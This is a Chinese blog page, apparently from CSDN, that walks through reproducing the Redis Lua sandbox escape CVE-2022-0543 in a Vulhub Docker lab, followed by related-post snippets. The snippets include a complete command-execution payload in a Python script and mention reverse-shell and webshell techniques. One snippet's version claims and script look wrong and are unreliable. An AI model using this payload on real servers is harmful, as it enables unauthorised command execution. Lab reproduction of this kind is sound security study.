Redis 沙盒逃逸漏洞复现（CVE-2022-0543）

最新推荐文章于 2025-05-30 20:36:07 发布

hicode0101

最新推荐文章于 2025-05-30 20:36:07 发布

阅读量740

点赞数 8

CC 4.0 BY-SA版权

文章标签： redis junit 数据库

本文链接：https://blog.youkuaiyun.com/hicode0101/article/details/145205613

Redis 存在代码注入漏洞，攻击者可利用该漏洞远程执行代码。

Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。

我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数，即可获得io库，再使用其执行命令。

Lua是由C编写的，上面的话就是说我们可以直接调用一个变量然后操作io库进行任意执行。但是要实现CVE-2022--0543复现首先redis得有未授权访问漏洞或者我们已经通过一些手段进入了redis。

值得注意的是，不同环境下的liblua库路径不同，你需要指定一个正确的路径。在我们Vulhub环境（Ubuntu fiocal）中，这个路径是/usr/lib/x86_64-linux-gnu/liblua5.1.so.0。

查找 liblua5.1.so.0 文件命令：

find / -name liblua*.*

拉取实验环境的容器

下载镜像

docker pull vulhub/redis:5.0.7

启动容器

docker run --name vul-redis-5.0.7 -p 6378:6379 -d vulhub/redis:5.0.7

执行语句

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

hicode0101

关注关注

8
点赞
踩
10

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Reids RCE-CVE-2022-0543 复现

weixin_52532634的博客

02-02

531

local f = io.popen("在这里命令", "r");编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库，并提供多种语言的API。如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问。一般都是默认的端口好6379，这里端口号是环境映射的。

CVE-2022-0543 Redis沙盒逃逸漏洞复现(CVE-2022-0543)

XZ_______的博客

04-21

1826

漏洞复现

参与评论您还未登录，请先登录后发表或查看评论

redis未授权(CVE-2022-0543)

05-30

1189

Redis未授权访问漏洞分析 Redis默认配置存在未授权访问风险，若以root身份运行且未设置密码，攻击者可利用该漏洞获取系统权限。漏洞利用方式包括：通过写入SSH公钥实现免密登录、利用crontab反弹shell、在Web目录写入WebShell等。攻击者无需认证即可访问内部数据，甚至执行任意命令，危害严重。环境复现显示，通过redis-cli连接目标服务器后，攻击者可通过修改Redis配置实现文件写入，最终获取系统控制权。防范措施包括设置强密码、限制访问权限、不以root身份运行Redis服务等。

CVE-2022-0543 Redis Lua沙盒绕过命令执行

Foreverlove112的博客

09-22

648

CVE-2022-0543 Redis Lua沙盒绕过命令执行

CVE-2022-0543（redis沙盒逃逸）详细漏洞复现

没事我溜达

03-25

9592

参考：vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub Redis Lua沙盒绕过命令执行（CVE-2022-0543） Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。直接写复现全过程吧

cve_2022_0543-redis沙盒漏洞复现 vulfocus

c0529的博客

06-10

879

该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量，该变量又允许访问任意 Lua 功能。

Redis-未授权访问-CVE-2022-0543 (redis沙盒逃逸)

MateSnake的博客

05-13

1327

Redis-未授权访问-CVE-2022-0543 (redis沙盒逃逸)

CVE-2022-0543 Redis沙盒逃逸漏洞

weixin_45715461的博客

07-01

3722

CVE-2022-0543 Redis沙盒逃逸漏洞

vulfocus靶场之redis命令执行cve-2022-0543漏洞复现

没有故事

04-18

1188

我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。输入网址和端口，点击OK。

CVE-2022-0543（lua沙盒绕过命令执行）复现

kriesa的博客

07-13

715

CVE-2022-0543复现

Redis Lua沙箱绕过RCE(CVE-2022-0543)复现

3tefanie的博客

03-16

2578

【牛角尖扎人，都不如刀子嘴戳人来得厉害】

[漏洞复现]Redis 沙盒逃逸漏洞（CVE-2022-0543）

k5664524的博客

01-25

781

Redis 存在代码注入漏洞，攻击者可利用该漏洞远程执行代码。

CVE-2022-0543 Redis Lua 沙盒逃逸 RCE

Adminxe的博客

03-14

4471

0x00 背景巴西研究员 Reginaldo Silva 于 2022 年 3 月 8 日公开披露该漏洞,从他的博客得知 CVE-2022-0543 该 Redis 沙盒逃逸漏洞仅影响 Debian 系的 Linux 发行版本,并非 Redis 本身漏洞 https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce 0x01 条件未授权访问或拿到账号密码目标为Debian及其衍生版 0x02 原理首先,redis一直有一..

CVE-2022-0543（Redis 沙盒逃逸漏洞）

热门推荐

Battery的博客

11-23

11万+

CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中，用户连接后可以通过eval命令执行Lua脚本，但在沙箱环境中脚本无法执行命令或读取文件。然而，攻击者可以利用Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io，从而获得io库并执行命令。为了利用这个漏洞，攻击者需要在Redis客户端中输入恶意payload，其中whoami是要执行的命令，也可以根据需求更换其他命令。

【CVE-2022-0543】Redis Lua沙盒绕过命令执行复现

网安君的博客

03-16

6226

0x00 漏洞简介 Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本1的能力。 Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。参考链接： https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce https://bugs.debian.org/cgi-bin/

Redis沙盒逃逸漏洞(CVE-2022-0543)复现以及流量特征分析

xhscxj的博客

02-03

2236

Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值（Key-Value）存储数据库，并提供多种语言的API。Redis 存在代码注入漏洞，攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。

CVE-2022-0543（redis沙盒逃逸）

huayimy的博客

02-03

1006

CVE-2022-0543（redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值（Key-Value）存储数据库，并提供多种语言的API。运行完docker-compose后，打开我们的redis就是我们的漏洞环境啦

Redis Lua沙盒绕过命令执行（CVE-2022-0543）

swordheart的博客

06-23

473

漏洞原理介绍Redis 是一个开源（BSD 许可）的内存数据结构存储，用作数据库、缓存和消息代理。Redis 是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。在 Ubuntu 发行版打包中，不慎在 Lua 沙箱中重新分发一个箱对象，攻击利用这个对象的加载动态库，可以使用从 liblua 加载模块，然后使用此模块执行任意命令；参考链接：漏洞版本漏洞环境执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器docker-compose up -d服务启动后，我

cve-2022-0543漏洞复现

02-28

### CVE-2022-0543 漏洞详情 CVE-2022-0543 是 Redis 中的一个沙盒逃逸漏洞，允许攻击者通过特定的 Lua 脚本执行任意系统命令。Redis 使用 Lua 解释器来处理脚本操作，默认情况下启用了安全沙盒机制以防止潜在危险的操作。然而，在某些配置下，该沙盒可以被绕过，从而导致严重的安全隐患。 #### 影响版本受影响的主要版本包括但不限于 Redis 版本 6.x 和部分 7.x 的早期版本[^2]。 ### 复现环境搭建为了成功复现此漏洞，需准备如下条件： - 安装并运行易受攻击版本的 Redis 实例。 - 配置 Redis 不带任何身份验证措施（即禁用密码保护），以便于测试过程中不受阻碍地连接到服务器。 - 准备好能够发送自定义请求的客户端工具或编写相应的 Python/Shell 脚本来模拟攻击行为。 ### 漏洞利用过程下面是一个简单的 Python 脚本用于展示如何触发这个漏洞: ```python import redis def exploit_redis(): r = redis.Redis(host='localhost', port=6379, db=0) payload = ''' eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0 ''' result = r.execute_command(payload) print(result.decode()) if __name__ == '__main__': exploit_redis() ``` 上述代码尝试加载外部库 `liblua5.1.so` 并调用其中的方法打开管道执行 Linux 命令 `id` 来获取当前用户的 UID/GID 信息作为演示目的。实际应用中可以根据需求替换为其他恶意指令。请注意，以上内容仅限学习研究用途，请勿非法入侵他人计算机信息系统！